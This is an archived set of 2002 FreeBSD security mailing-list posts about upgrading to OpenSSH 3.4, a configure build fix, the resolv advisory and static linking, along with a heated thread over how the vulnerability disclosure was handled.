configure:6532: checking for mmap anon shared configure:6557: gcc -o conftest -g -O2 -Wall -Wpointer-arith -Wno-uninitialized conftest.c -lutil -lz >&5 In file included from configure:6543: /usr/include/sys/mman.h:141: syntax error before `mode_t' configure:6547: warning: return-type defaults to `int' configure:6560: $? = 1 configure: program exited with status 1 configure: failed program was: #line 6540 "configure" #include "confdefs.h" #include #include #if !defined(MAP_ANON) && defined(MAP_ANONYMOUS) #define MAP_ANON MAP_ANONYMOUS #endif main() { char *p; p = (char *) mmap(NULL, 10, PROT_WRITE|PROT_READ, MAP_ANON|MAP_SHARED, -1, 0); if (p == (char *)-1) exit(1); exit(0); } configure:6580: result: no Following is ad hoc patch for this problem: --- configure.ORG Wed Jun 26 23:08:18 2002 +++ configure Thu Jun 27 14:38:39 2002 @@ -6541,6 +6541,7 @@ #include "confdefs.h" #include +#include #include #if !defined(MAP_ANON) && defined(MAP_ANONYMOUS) #define MAP_ANON MAP_ANONYMOUS -- Koga, Youichirou To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 23: 6:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from patrocles.silby.com (d185.as9.nwbl0.wi.voyager.net [169.207.133.251]) by hub.freebsd.org (Postfix) with ESMTP id F0B0237B4C7 for ; Wed, 26 Jun 2002 23:06:28 -0700 (PDT) Received: from patrocles.silby.com (localhost [127.0.0.1]) by patrocles.silby.com (8.12.4/8.12.4) with ESMTP id g5R68tcv066627; Thu, 27 Jun 2002 01:08:55 -0500 (CDT) (envelope-from silby@silby.com) Received: from localhost (silby@localhost) by patrocles.silby.com (8.12.4/8.12.4/Submit) with ESMTP id g5R68oEf066624; Thu, 27 Jun 2002 01:08:53 -0500 (CDT) X-Authentication-Warning: patrocles.silby.com: silby owned process doing -bs Date: Thu, 27 Jun 2002 01:08:50 -0500 (CDT) From: Mike Silbersack To: Koga Youichirou Cc: freebsd-security@FreeBSD.ORG Subject: Re: new sshd 3.4p1 In-Reply-To: <20020627.144542.104107070.y-koga@jp.FreeBSD.org> Message-ID: <20020627010828.Y66277-100000@patrocles.silby.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Could you contact the openssh-portable maintainers and have them add your patch? Thanks, Mike "Silby" Silbersack On Thu, 27 Jun 2002, Koga Youichirou wrote: > "alexus" : > > any ideas why am i geting this ? > > There occurs a syntax error in sys/mman.h while checking for mmap anon > shared. > > configure:6532: checking for mmap anon shared > configure:6557: gcc -o conftest -g -O2 -Wall -Wpointer-arith -Wno-uninitialized > conftest.c -lutil -lz >&5 > In file included from configure:6543: > /usr/include/sys/mman.h:141: syntax error before `mode_t' > configure:6547: warning: return-type defaults to `int' > configure:6560: $? = 1 > configure: program exited with status 1 > configure: failed program was: > #line 6540 "configure" > #include "confdefs.h" > > #include > #include > #if !defined(MAP_ANON) && defined(MAP_ANONYMOUS) > #define MAP_ANON MAP_ANONYMOUS > #endif > main() { char *p; > p = (char *) mmap(NULL, 10, PROT_WRITE|PROT_READ, MAP_ANON|MAP_SHARED, -1, 0); > if (p == (char *)-1) > exit(1); > exit(0); > } > > configure:6580: result: no > > > Following is ad hoc patch for this problem: > > --- configure.ORG Wed Jun 26 23:08:18 2002 > +++ configure Thu Jun 27 14:38:39 2002 > @@ -6541,6 +6541,7 @@ > #include "confdefs.h" > > #include > +#include > #include > #if !defined(MAP_ANON) && defined(MAP_ANONYMOUS) > #define MAP_ANON MAP_ANONYMOUS > > -- Koga, Youichirou > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 23:26:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from blade-runner.mit.edu (BLADE-RUNNER.MIT.EDU [18.78.0.22]) by hub.freebsd.org (Postfix) with ESMTP id 9051037B400 for ; Wed, 26 Jun 2002 23:26:45 -0700 (PDT) Received: (from petr@localhost) by blade-runner.mit.edu (8.11.6/8.11.6) id g5R6RJm51470; Thu, 27 Jun 2002 02:27:19 -0400 (EDT) (envelope-from petr) To: Dave Cc: freebsd-security@FreeBSD.ORG Subject: Meta (was Re: Wow) References: <20020626121754.F8071@mail.seattleFenix.net> <200206261919.g5QJJLLI018466@cvs.openbsd.org> <20020626202057.GA7152@zot.electricrain.com> <20020626223919.GA31673@elvis.mu.org> From: Petr Swedock Date: 27 Jun 2002 02:27:19 -0400 In-Reply-To: Dave's message of Wed, 26 Jun 2002 15:39:19 -0700 Message-ID: <86it45z16g.fsf_-_@blade-runner.mit.edu> Lines: 74 X-Mailer: Gnus v5.3/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dave writes: > > To whom it may concern on the list, > > Shut the fuck up, you bunch of belligerent, whiney dorks. > No one gives a rat's ass if you get hacked. Actually, I I need this list to be useful. I daresay others here feel the same way. The last few days have raised some concerns for me, about the usefulness of this list. With that thought in mind, here's a stack of what is of concern to me. I present it to the list as some points for a meta-discussion of policy, disclosure, list use and risk-assessment. 1.) Crying wolf Theo is not vindicated by the absence of compromised machines. His actions were wrong, overwrought patronizing and ultimately unhelpful. He cried wolf. Fine. He's forgiven, absolved and, one hopes, suitably chastened enough not to do it again. But if the list is to operate free of such cruft we should recognize it and work together to provide some context by which threats are identified and assessed cogently and coherently. 2.) Hysteria One person screams -- many people jump. That's not a good security posture. If this list is to be of any use at all, then hysteria must be kept to a minimum. FreeBSD (to me) is about taking the right things seriously and about refusing to take the wrong things seriously. I don't think that happened here. 3.) Disclosure and risk assesment. Theo knows nothing of me, or my job. Nor should he. Therefor, he should not be in the business of risk assesment for my job. Nobody but I should do that job. My sense is that Theo is in earnest, with a genuine desire to prevent breakins. Fine. If he wants to be helpful, he can practice some of the generally accepted models of disclosure and feedback in the open source community. That's the only way I can think of that will allow me to best assess the risk to my machines and users (short of hiring Theo to work for me). This list is (should be) an excellent forum for that disclosure and feedback. So those are my concerns. I'm interested to know if others share these concerns and what we can do about them. Peace, Petr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 0: 6:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from tesla.distributel.net (nat.MTL.distributel.NET [66.38.181.24]) by hub.freebsd.org (Postfix) with ESMTP id 988FF37B414 for ; Thu, 27 Jun 2002 00:05:57 -0700 (PDT) Received: (from bmilekic@localhost) by tesla.distributel.net (8.11.6/8.11.6) id g5QJcw443983 for freebsd-security@FreeBSD.ORG; Wed, 26 Jun 2002 15:38:58 -0400 (EDT) (envelope-from bmilekic@unixdaemons.com) Date: Wed, 26 Jun 2002 15:38:58 -0400 From: Bosko Milekic To: freebsd-security@FreeBSD.ORG Subject: Re: Wow [OpenSSH solutions] Message-ID: <20020626153858.A43920@unixdaemons.com> References: <200206261741.g5QHf3LI027927@cvs.openbsd.org> <867kklaneg.fsf@blade-runner.mit.edu> <1025118105.443.8.camel@ech.maverik.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <1025118105.443.8.camel@ech.maverik.com>; from tstevenson@maverik.com on Wed, Jun 26, 2002 at 01:01:45PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Folks, Please stop this _now_. We really don't need to see any of this anymore and what's happening, as a result, is that those folks who are stuck having to weed through this thread to find the actual solution can no longer do that effectively, because it is cluttered with people complaining about this and that. While I understand frustrations from all different angles, and while it would be wrong for me to argue that those frustrations are unreasonable, we need to compromise and let things slide. Let's suck it up here and make, if anything, one act that benefits the community as a whole. There was a problem with OpenSSH, it may or may not have been perfectly handled, but what happened happened. And now we have to move on. freebsd-security, your options are: 1) If you run -STABLE, and you _really_ cannot upgrade for some reason to OpenSSH 3.4, staying with the version in -STABLE should be OK for what concerns this particular problem; consider allocating the resources for that upgrade Real Soon Now, though. If you insist, stay where you are, and I'm sure we'll be getting something from the security-officer suggesting to follow with option (2) below; If you're running -CURRENT, go to option (2) immediately. 2) Upgrade to 3.4, not only does it properly solve the problem ISS and the OpenSSH team has warned us about, but it also solves several other issues that may be related to security. It's the new version, it's production, and it's what anyone who has the resources should move to, now that we know the nature of the problem. Trust me, this can be done fairly easily. You can even install into an isolated target directory and make appropriate [temporary] symlinks until 3.4 is properly imported, at which point you can remove the symlinks and use the imported version, if you so desire. Again, I understand that resources were probably allotted to dealing with this problem and that some of them may have been avoidable. But things are the way they are and a solution _has_ been provided now, so continued complaints will not help the situation anymore, at all. Discussing the what, how, and where at this point is redundant. Thank you all in advance for your cooperation and thank you to the OpenSSH team for 3.4, despite all differences in opinion regarding the way in which it came about. Best regards, -- Bosko Milekic bmilekic@unixdaemons.com bmilekic@FreeBSD.org P.S.: If anyone cares to keep the discussion going for some reason, let's move it to -chat. No need to start any additional threads on -security. Thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 0:15:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from heresy.dreamflow.nl (heresy.dreamflow.nl [62.58.36.22]) by hub.freebsd.org (Postfix) with SMTP id 9C7F037B405 for ; Thu, 27 Jun 2002 00:15:23 -0700 (PDT) Received: (qmail 14852 invoked by uid 1000); 27 Jun 2002 07:15:21 -0000 Date: Thu, 27 Jun 2002 09:15:21 +0200 From: Bart Matthaei To: Bosko Milekic Cc: security@freebsd.org Subject: Re: Wow [OpenSSH solutions] Message-ID: <20020627091521.C4725@heresy.dreamflow.nl> References: <200206261741.g5QHf3LI027927@cvs.openbsd.org> <867kklaneg.fsf@blade-runner.mit.edu> <1025118105.443.8.camel@ech.maverik.com> <20020626153858.A43920@unixdaemons.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020626153858.A43920@unixdaemons.com>; from bmilekic@unixdaemons.com on Wed, Jun 26, 2002 at 03:38:58PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 03:38:58PM -0400, Bosko Milekic wrote: [snip] If I understand correctly, setting "ChallengeResponseAuthentication no" in the sshd config file also fixxes the problem. (This is a good temp. solution until the dust settles, since I have no overview of this problem whatsoever due to the continues flooding of this list). Regards, Bart -- Bart Matthaei bart@dreamflow.nl If at first you don't succeed, redefine success. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 0:16:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [216.240.41.2]) by hub.freebsd.org (Postfix) with ESMTP id C8EF737B40B for ; Thu, 27 Jun 2002 00:15:58 -0700 (PDT) Received: from apollo.backplane.com (localhost [127.0.0.1]) by apollo.backplane.com (8.12.3/8.12.3) with ESMTP id g5R7Fql1065616; Thu, 27 Jun 2002 00:15:52 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.12.3/8.12.3/Submit) id g5R7Fqv9065615; Thu, 27 Jun 2002 00:15:52 -0700 (PDT) (envelope-from dillon) Date: Thu, 27 Jun 2002 00:15:52 -0700 (PDT) From: Matthew Dillon Message-Id: <200206270715.g5R7Fqv9065615@apollo.backplane.com> To: Klaus Steden Cc: Roger Marquis , security@FreeBSD.ORG Subject: Re: Legacy Static Linking (was: Security Advisory FreeBSD-SA-02:28.resolv) References: <20020626183519.F36946-100000@roble.com> <20020627012510.X589@cthulu.compt.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Yes, our /bin and /sbin contain static-linked binaries. Stuff in /usr typically contains dynamically linked binaries. The reasons are: * So we can keep the root partition small (not have to put some of the dynamic link libraries in root or need a /lib). * Safety. When things go wrong having critical system boot and recovery programs statically linked will save your bacon. It's certainly saved mine! Lots of things can go wrong, from a bad system upgrade to a blown filesystem to simple mistakes by developers. Static linking eats a little extra space but that's about it. Statically linked binaries will actually start up more quickly and use less 'dirty' memory (due to not having to do any run-time linking) so it isn't a performance issue, really. Having the small number of programs in /bin and /sbin statically linked makes sense, and having the much greater number of programs in /usr dynamically linked to save space also makes sense. -Matt Matthew Dillon :> :> This makes a good case for doing away with static linking of system :> binaries. :> :> Why does FreeBSD have statically linked binaries? :> :I dunno, I find static binaries pretty damn useful as bootstrap and recovery :tools on broken systems that don't necessarily run FreeBSD but whose disks I :have to preserve. : :Static binaries still have a purpose, inasmuch as dynamic binaries have a :purpose. I would be disappointed to discover static linking done away with ... :however, a system-wide compile time option might not be a bad idea. : :$0.02, :Klaus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 0:18:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from elvis.mu.org (elvis.mu.org [192.203.228.196]) by hub.freebsd.org (Postfix) with ESMTP id 3249F37B405 for ; Thu, 27 Jun 2002 00:18:49 -0700 (PDT) Received: by elvis.mu.org (Postfix, from userid 1192) id 1D199AE160; Thu, 27 Jun 2002 00:18:49 -0700 (PDT) Date: Thu, 27 Jun 2002 00:18:49 -0700 From: Alfred Perlstein To: Lachlan O'Dea Cc: freebsd-security@freebsd.org Subject: Re: resolv and dynamic linking to compat libc Message-ID: <20020627071849.GG18877@elvis.mu.org> References: <3D1AA5F2.9020305@ca.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3D1AA5F2.9020305@ca.com> User-Agent: Mutt/1.3.27i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org * Lachlan O'Dea [020626 22:43] wrote: > Hi, > > With regard the resolv vulnerability, is there any issue with older > binaries that are linking against an older libc.so? For example, on my > box I have a /usr/lib/compat/libc.so.3. Will a make world fix this > library as well? Yes, that's a problem, you need to either recompile your binary or create a patched version of libc.so.3 if it is indeed vulnerable. -- -Alfred Perlstein [alfred@freebsd.org] 'Instead of asking why a piece of software is using "1970s technology," start asking why software is ignoring 30 years of accumulated wisdom.' Tax deductible donations for FreeBSD: http://www.freebsdfoundation.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 0:32:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from 12-234-90-219.client.attbi.com (12-234-90-219.client.attbi.com [12.234.90.219]) by hub.freebsd.org (Postfix) with ESMTP id F261B37B405 for ; Thu, 27 Jun 2002 00:32:05 -0700 (PDT) Received: from master.gorean.org (master.gorean.org [10.0.0.2]) by 12-234-90-219.client.attbi.com (8.12.3/8.12.3) with ESMTP id g5R7W5Bu046947; Thu, 27 Jun 2002 00:32:05 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from localhost (doug@localhost) by master.gorean.org (8.12.4/8.12.4/Submit) with ESMTP id g5R7W4ZH082137; Thu, 27 Jun 2002 00:32:04 -0700 (PDT) Date: Thu, 27 Jun 2002 00:32:04 -0700 (PDT) From: Doug Barton To: Brett Glass Cc: "H. Wade Minter" , Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv In-Reply-To: <4.3.2.7.2.20020626143023.022716c0@localhost> Message-ID: <20020626171543.O42503-100000@master.gorean.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, Brett Glass wrote: > At 01:26 PM 6/26/2002, H. Wade Minter wrote: > > >So am I correct in assuming that this fix requires a complete system > >rebuild (make buildworld) as opposed to just rebuilding a particular > >module? > > Worse than that. Every package or port must be reinstalled > or rebuilt too. Ditto everything you've built from source. Only things that are linked statically, which is generally a minority of applications. $ for file in `find /usr/local -type f`; do case `/usr/bin/file $file` in *dynamically*) dynamic=$(($dynamic + 1)) ; echo $file ;; *statically*) static=$(($static + 1)) ; echo $file ;; esac done $ echo "static: $static dynamic: $dynamic" static: 9 dynamic: 916 Please don't be needlessly alarmist. Doug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 0:35:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.web.de (smtp02.web.de [217.72.192.151]) by hub.freebsd.org (Postfix) with ESMTP id 7902337B407 for ; Thu, 27 Jun 2002 00:35:28 -0700 (PDT) Received: from [217.225.204.77] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.70 #5) id 17NTnn-0001Gn-00; Thu, 27 Jun 2002 09:34:51 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id C70463D3; Thu, 27 Jun 2002 09:34:44 +0200 (CEST) Received: from jan-linux.lan (jan-linux.lan [192.168.0.20]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 732FC3D2; Thu, 27 Jun 2002 09:34:41 +0200 (CEST) Subject: Re: Legacy Static Linking (was: Security Advisory FreeBSD-SA-02:28.resolv) From: Jan Lentfer To: Matthew Dillon Cc: Klaus Steden , Roger Marquis , security@FreeBSD.ORG In-Reply-To: <200206270715.g5R7Fqv9065615@apollo.backplane.com> References: <20020626183519.F36946-100000@roble.com> <20020627012510.X589@cthulu.compt.com> <200206270715.g5R7Fqv9065615@apollo.backplane.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7-1mdk Date: 27 Jun 2002 09:34:39 +0200 Message-Id: <1025163280.2815.19.camel@jan-linux.lan> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Am Don, 2002-06-27 um 09.15 schrieb Matthew Dillon: > Yes, our /bin and /sbin contain static-linked binaries. Stuff in /usr > typically contains dynamically linked binaries. The reasons are: [...] There are also quite a few statically linked binaries in /usr bash-2.05# file /usr/bin/* | grep stati /usr/bin/addr2line: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/ar: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/as: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/bunzip2: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/bzcat: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/bzip2: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/c++filt: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/cc: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/chflags: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/gasp: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/gcc: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/gdb: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/gunzip: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/gzcat: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/gzip: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/ld: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/make: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/nm: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/objcopy: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/objdump: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/objformat: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/ranlib: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/size: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/strings: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/strip: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/tar: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/bin/zcat: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped bash-2.05# file /usr/sbin/* | grep stati /usr/sbin/pccardc: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped /usr/sbin/pccardd: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped So, what I did now I cvsup'ed my src (fom cvsup3.de) and made world. How can I make sure I got the fixed source from cvs? Regards, Jan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 0:43:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from cvs.openbsd.org (cvs.openbsd.org [199.185.137.3]) by hub.freebsd.org (Postfix) with ESMTP id 53C9B37B400 for ; Thu, 27 Jun 2002 00:43:09 -0700 (PDT) Received: from cvs.openbsd.org (deraadt@localhost [127.0.0.1]) by cvs.openbsd.org (8.12.5/8.12.1) with ESMTP id g5R7hswj029148; Thu, 27 Jun 2002 01:43:55 -0600 (MDT) Message-Id: <200206270743.g5R7hswj029148@cvs.openbsd.org> To: Wincent Colaiuta Cc: freebsd-security@freebsd.org Subject: Re: Wow (or, How Theo should have handled it) In-reply-to: Your message of "Thu, 27 Jun 2002 13:36:59 +0930." <53E21546-8983-11D6-BE6B-003065C60B4C@mac.com> Date: Thu, 27 Jun 2002 01:43:54 -0600 From: Theo de Raadt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Seriously, Theo, the best thing you could've done would have been to > fully disclose the original bug in the challenge/response code and the > one-line fix (turn off challenge/response auth), and told people two > things: firstly, that patches were being worked on; and secondly, that > 3.4 was on the way soon and that it would be desirable to upgrade to > that and activate priv separation so as to better cope with future > potential holes. The first half of what you say is completely insane; The second half is exactly what we did. Fact is, you ranting assholes are complete idiots. Let me explain. I alerted many people by saying "Take a security stance now". MANY MANY people were saved by this. The important people; the alert ones. You have no idea how many very important institutions have mailed me with a thanks. Fortune 100 companies did the right thing, and filtered their port 22 access corporation wide a matter of minutes after I said so. But you, some little home-boy I suspect, are clearly different than them (mostly, by being long winded loudmouths who don't understand). I could not say it was ChallengeResponse, because then it is a lot less code to check. I could not say what version it happened in, because 2.9 -> 2.9.9 was largely a ChallengeResponse rewrite. I could not say it was protocol 2 vs protocol 1. And we had very little information ISS about exactly which systems were vulnerable. Note how ISS has posted it is *BSD only? I am not alone; many vendors and CERT being that they are going to be proven very very wrong. Even saying it is *BSD only, or Linux only, to some of the exploit authors means things like "Hmm, malloc trampoline... GOT table modification"... and they know better what kind of thing to look for. I'm not stupid: I know that any of the above details would have resulted in an exploit. I still do not believe ISS that this thing was wild. If it was, we would already have seen it on BUGTRAQ, because wild does not mean that someone has an exploit. Wild means it is being distributed in an out of control fashion, and people are starting to use it. As of the posting time -- it was not wild. I estimate that in more than half of the cases, as soon as a bug goes wild, it gets posted because whoever wrote it wants their credit. Therefore, we had a a timeframe of opportunity, to alert, and have people take a ready stance, whether that be by changing software, by changing their filters, by disabling, whatever. I'm not stupid. I understand the situation very well. BUT YOU GUYS ARE STUPID. YOU DO NOT UNDERSTAND THE SITUATION. I made an educated guess and largely the evidence is still that I was right. You guys turned into a bunch of ranting raving assholes, wasting my time, and attempting via your noise to slow the spread of the good word that something was coming. AND YOU GUYS TRIED TO SLOW PEOPLE'S ACCEPTANCE OF NEW CODE, without knowing a SINGLE THING about what it was. You're the worst kind of uneducated idiots, trying to prevent people from taking a ready stance against an upcoming problem. "Naw, Theo is just crying wolf", they said. Instead of saying a simple workaround and resulting in immediate exploit development commencing, I alerted that something unknown was coming. We wrote a patch in the first 3 minutes of becoming aware of it. And we went into overdrive to attack two other possible class of bugs that we became aware of during the same week, resulting in 5600 lines of changes. I did this right. But some meddling idiots attempted to foil the efficiency of the warning. That said, I'll remind people that I have been one of the STRONGEST proponents for full disclosure, just go read what I've written on BUGTRAQ over the last 7 years. And this WAS fully disclosed, in a rapid fashion. It just had a little warning ahead because I was convinced that it was at least partially controlled. Just telling the entire world that the 2nd most common TCP port number they let through their firewall has this specific easily exploitable hole, all at once... you're just so out of touch. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 0:57:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from 12-234-90-219.client.attbi.com (12-234-90-219.client.attbi.com [12.234.90.219]) by hub.freebsd.org (Postfix) with ESMTP id 49FC737B400 for ; Thu, 27 Jun 2002 00:57:50 -0700 (PDT) Received: from master.gorean.org (master.gorean.org [10.0.0.2]) by 12-234-90-219.client.attbi.com (8.12.3/8.12.3) with ESMTP id g5R7vnBu047084; Thu, 27 Jun 2002 00:57:49 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from localhost (doug@localhost) by master.gorean.org (8.12.4/8.12.4/Submit) with ESMTP id g5R7vnQR082183; Thu, 27 Jun 2002 00:57:49 -0700 (PDT) Date: Thu, 27 Jun 2002 00:57:49 -0700 (PDT) From: Doug Barton To: Roger Marquis Cc: security@FreeBSD.org Subject: Re: Legacy Static Linking (was: Security Advisory FreeBSD-SA-02:28.resolv) In-Reply-To: <20020626183519.F36946-100000@roble.com> Message-ID: <20020627005639.O42503-100000@master.gorean.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, Roger Marquis wrote: > This makes a good case for doing away with static linking of system > binaries. I think you've got some good answers to this already, but I'd like to add that static /bin and /sbin are also useful for diskless booting. I don't think that they will go away any time soon. :) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 1:37:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id A9EBA37B406 for ; Thu, 27 Jun 2002 01:37:10 -0700 (PDT) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id SAA17907; Thu, 27 Jun 2002 18:37:05 +1000 (EST) From: Darren Reed Message-Id: <200206270837.SAA17907@caligula.anu.edu.au> Subject: Re: Wow (or, How Theo should have handled it) To: deraadt@cvs.openbsd.org (Theo de Raadt) Date: Thu, 27 Jun 2002 18:37:05 +1000 (Australia/ACT) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <200206270743.g5R7hswj029148@cvs.openbsd.org> from "Theo de Raadt" at Jun 27, 2002 01:43:54 AM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In some mail from Theo de Raadt, sie said: [...] > I still do not believe ISS that this thing was wild. If it was, we > would already have seen it on BUGTRAQ, because wild does not mean that > someone has an exploit. Wild means it is being distributed in an out > of control fashion, and people are starting to use it. As of the > posting time -- it was not wild. I estimate that in more than half of > the cases, as soon as a bug goes wild, it gets posted because whoever > wrote it wants their credit. [...] This discrepency is, I believe, just a misunderstanding of what they term wild vs what you term wild. You're using the term "wild" as in "wildfire" whereas they might mean "wild" as in it's out there, somewhere, perhaps hiding, lurking, not in your control, not everwhere but waiting to jump you when you least expect it - more like a wild cat. I think you're wrong on the exploits being published - there's current evidence that strongly suggests things can be kept quiet, "in the wild", for months before they end up on bugtraq. Neils might be able to 